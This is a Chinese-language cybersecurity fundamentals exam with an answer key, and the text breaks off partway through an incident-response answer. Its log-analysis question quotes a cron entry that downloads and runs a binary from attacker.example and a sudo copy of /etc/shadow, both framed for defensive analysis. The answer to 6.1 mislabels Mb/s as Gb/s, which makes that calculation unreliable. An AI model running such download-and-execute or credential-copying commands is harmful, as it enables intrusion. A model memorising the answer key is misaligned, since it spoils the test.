2026年网络安全基础知识考试试卷培训试卷

2026年网络安全基础知识考试试卷培训试卷1.单选题（每题2分，共30分）1.1在TLS1.3握手过程中，用于实现前向保密的核心机制是A.RSA密钥传输B.静态DH密钥交换C.(EC)DHE临时密钥交换D.PSK-only模式1.2某企业采用零信任架构，下列哪项最能体现“永不信任、持续验证”原则A.内网流量默认放行，外网流量强制二次认证B.所有访问主体每次请求资源时均需动态评估风险C.办公区终端通过MAC白名单即可免认证接入D.VPN隧道建立后不再做二次身份校验1.3关于国密SM4分组密码算法，下列描述正确的是A.分组长度128位，密钥长度可变128/192/256位B.分组长度256位，密钥长度128位C.分组长度128位，密钥长度128位D.分组长度64位，密钥长度128位1.4利用机器学习检测DGA域名时，以下特征对随机性度量最敏感的是A.域名长度B.元音字母占比C.香农熵D.顶级域类型1.5在Linux系统中，若文件权限为“-rwsr-xr--”，则普通用户执行该文件时进程的EUID为A.调用者UIDB.文件属主UIDC.rootUIDD.调用者GID1.6针对JSONWebToken(JWT)的最佳安全实践是A.将敏感数据放入Payload并采用HS256签名B.禁用签名直接采用“none”算法提升性能C.使用RSA-PSS签名并设置短过期时间D.密钥硬编码在移动端代码中便于调试1.7某云函数因未删除临时凭证，导致攻击者横向移动，该漏洞最可能出现在A.函数冷启动阶段B.函数执行上下文环境变量C.函数日志持久化存储D.函数容器镜像层1.8在IPv6网络中，用于替代ARP的协议是A.NDPB.DHCPv6C.ICMPv6-RAD.MLD1.9下列哪项最能缓解BGP劫持攻击A.在边缘路由器启用RPKI-ROVB.关闭BGPTTL安全机制C.增加AS-Path预置D.降低MED值1.10关于硬件安全模块(HSM)的描述，错误的是A.提供防篡改的密钥存储B.支持密钥托管恢复C.可执行加密运算卸载D.允许导出私钥明文进行备份1.11在Windows日志中，事件ID4624表示A.账户登录失败B.账户成功登录C.特权提升D.对象访问审计1.12利用Return-orientedProgramming(ROP)绕过DEP时，攻击者依赖的是A.堆喷射技术B.栈溢出覆盖SEHC.已有代码片段(gadget)拼接D.修改页表可执行位1.13以下哪项属于后量子密码学主流算法A.ECDSAB.KyberC.RSA-4096D.SHA-31.14在容器逃逸场景中，攻击者最常利用的Linux内核子系统是A.cgroupv1release_agentB.netfilterC.auditD.fuse1.15当使用DNS-over-HTTPS(DoH)时，主要安全收益是A.防止DNS缓存投毒B.隐藏查询内容免受本地网络窃听C.降低DNS查询延迟D.阻止域名劫持递归服务器2.多选题（每题3分，共30分；多选少选均不得分）2.1以下哪些属于常见的侧信道攻击A.时序分析B.功耗分析C.缓存命中分析D.Rowhammer2.2关于同源策略(SOP)，下列说法正确的是A.端口不同即视为不同源B.协议不同即视为不同源C.子域可通过document.domain放宽限制D.CORS响应头可允许跨源写操作2.3以下哪些技术可有效防御SQL注入A.预编译参数化查询B.严格输入白名单C.存储过程封装D.前端JavaScript过滤单引号2.4在Kubernetes中，可限制容器权限的安全机制包括A.PodSecurityPolicy/PodSecurityStandardsB.SeccompProfileC.AppArmorD.NetworkPolicy2.5关于内存安全语言Rust的特性，正确的是A.编译期所有权模型防止空悬指针B.无需任何运行时垃圾回收C.允许unsafe块进行底层操作D.默认线程间共享内存无需同步原语2.6以下哪些属于NISTSP800-63B推荐的MFA因素A.记忆秘密(口令)B.一次性OTP设备C.生物特征(指纹)D.地理位置GPS2.7在无线局域网中，WPA3-Enterprise192位模式强制使用的加密套件包括A.AES-GCMP-256B.SHA-384C.ECDSA-384D.TKIP2.8以下哪些日志源可用于威胁狩猎发现Kerberoasting攻击A.WindowsEventID4768(TGT请求)B.WindowsEventID4769(TGS请求)C.WindowsEventID4771(Kerberos预认证失败)D.WindowsEventID4672(特殊权限登录)2.9关于区块链共识机制的安全考量，正确的是A.PoW中51%算力可逆转交易B.PoS中无利害攻击(Nothing-at-Stake)需惩罚机制C.BFT类算法需保证n≥3f+1D.智能合约重入漏洞与共识层无关2.10以下哪些属于GDPR定义的“个人数据”A.已哈希化的邮箱地址(不可逆)B.动态IP地址C.可穿戴设备收集的心率数据D.匿名化后无法关联到自然人的数据集3.判断题（每题1分，共10分；正确打“√”，错误打“×”）3.1在公钥基础设施中，OCSPStapling可降低CA服务器负载并提升隐私。3.2使用HTTPS即可完全防御中间人攻击，无需证书固定。3.3内存马(WebShell无文件)在磁盘上找不到恶意文件，因此传统杀毒软件无法检测。3.4基于深度包检测(DPI)的防火墙无法识别TLS1.3加密流量中的SNI。3.5在Linux中，若进程capability集无CAP_SYS_MODULE，则无法动态加载内核模块。3.6量子计算机运行Shor算法可在多项式时间内破解椭圆曲线离散对数问题。3.7使用ChaCha20-Poly1305比AES-GCM在移动端更省电，因为后者需要硬件AES指令。3.8在SocialEngineering中，攻击者利用“权威原则”比“互惠原则”更容易制造紧急响应。3.9采用微服务架构后，服务间通信若全部使用mTLS，则无需再考虑API认证。3.10基于eBPF的恶意程序可在内核态执行，但受Verifier机制限制无法形成持久化驻留。4.填空题（每空2分，共20分）4.1在PKI体系中，用于签发终端实体证书的证书通常被称为________证书。4.2当Linux内核开启________安全模块后，可通过策略限制程序访问资源。4.3在Windows利用Mimikatz导出凭据时，需要________权限以读取LSASS进程内存。4.4针对JSON数据结构的NoSQL注入操作符，MongoDB的经典示例是________。4.5在IPv6地址2001:db8::1/64中，前缀长度为________位。4.6用于衡量密码破解难度的单位“kH/s”表示每秒计算________次哈希。4.7在威胁情报STIX2.1中，表示攻击者技术细节的对象类型为________。4.8基于硬件的内存隔离技术Intel________可创建可信执行环境。4.9在Linux系统中，命令“sysctl-wkernel.kptr_restrict=2”用于限制________泄露。4.10当使用Scapy发送TCPSYN包并等待SYN-ACK，该扫描方式称为________扫描。5.简答题（每题10分，共30分）5.1简述TLS1.3与TLS1.2在握手延迟、密码套件、前向保密三方面的主要差异，并说明为何TLS1.3能提升性能。5.2某电商平台发现大量异常订单，经分析攻击者利用GraphQL接口的批量查询漏洞获取千万级用户敏感字段。请给出完整的应急响应与修复方案，涵盖检测、遏制、根因、加固四阶段。5.3说明Rowhammer攻击原理，并列举三种硬件或软件层面的缓解措施，指出各自优缺点。6.综合计算与案例分析题（共30分）6.1某公司计划部署基于格的密钥封装机制Kyber-512，已知公钥大小为800B，密文大小为768B，计算在1万并发用户每秒进行一次密钥交换场景下，每天（24h）产生的额外流量（仅计算公钥+密文）。若链路带宽为1Gb/s，求该流量占比，并评估是否会成为瓶颈。（给出LaTeX公式与步骤，10分）6.2阅读以下日志片段，回答问题：2026-05-1814:32:01sshd[2147]:Acceptedpublickeyforuseralicefrom5port52341ssh2:RSASHA256:abcd12342026-05-1814:32:02sudo:alice:TTY=pts/1;PWD=/home/alice;USER=root;COMMAND=/bin/cp/etc/shadow/tmp/sh.bak2026-05-1814:32:03CROND[2159]:(root)CMD(wget-q-O/tmp/xhttp://attacker.example/x&&chmod+x/tmp/x&&/tmp/x)(1)指出攻击者已获取的权限及利用路径。（5分）(2)给出针对该事件的紧急处置命令序列（假设可立即登录受害主机）。（5分）(3)设计一条YARA规则，用于检测/tmp目录下下载的同类ELF木马，要求匹配“attacker.example”域名及“/bin/sh”字符串。（10分）7.答案与解析1.单选题1.1C 1.2B 1.3C 1.4C 1.5B 1.6C 1.7B 1.8A 1.9A 1.10D 1.11B 1.12C 1.13B 1.14A 1.15B2.多选题2.1ABCD 2.2ABCD 2.3ABC 2.4ABCD 2.5ABC 2.6ABC 2.7ABC 2.8ABC 2.9ABCD 2.10BC3.判断题3.1√ 3.2× 3.3√ 3.4×（ESNI/ECH已加密SNI） 3.5√ 3.6√ 3.7×（ChaCha20在缺乏AES-NI时更省电，但非绝对） 3.8√ 3.9×（mTLS仅解决传输层身份，仍需授权） 3.10×（eBPF程序可持久化于bpffs）4.填空题4.1中间CA/签发CA 4.2SELinux/AppArmor 4.3SeDebugPrivilege 4.4$ne 4.564 4.6千哈希 4.7AttackPattern 4.8SGX 4.9内核指针/kptr 4.10SYN半开/half-open5.简答题（要点示例）5.1TLS1.3将握手由2-RTT降为1-RTT甚至0-RTT；移除弱算法，套件精简为AEAD+密钥交换+哈希；强制(EC)DHE实现前向保密。减少往返、降低延迟，提升性能。5.2检测：GraphQL错误日志出现大量200且响应体巨大；遏制：WAF临时阻断批量查询、关闭introspection；根因：接口未限制查询深度与字段数，未启用costanalysis；加固：引入查询复杂度白名单、JWT+RBAC、字段级数据脱敏、API网关限流。5.3Rowhammer通过快速翻转相邻内存行导致位翻转，突破隔离。缓解：硬件ECC可纠正但成本高；TRR(TargetRowRefresh)由厂商实现，非完全公开；软件采用双倍行刷新或隔离敏感页，性能下降约5-15%。6.综合题6.1流量计算：单用户流量=800+768=1568B日总次数=10000×86400=8.64×10^8日总字节=1568×8.64×10^8=1.354752×10^{11}B换算比特：1.354752×10^{11}×8=1.0838016×10^{12}bit日带宽需求：1.0838016×10^{12}÷(24×3600)≈12.54Gb/s占比：12.54/1000≈1.25%结论：远低于1Gb/s上限，非瓶颈。6.2(1)攻击者通过SSH公钥登录alice账户，利用sudo提权至root，随后植入cron后门。(2)紧急处置：systemctlstopcronkill$(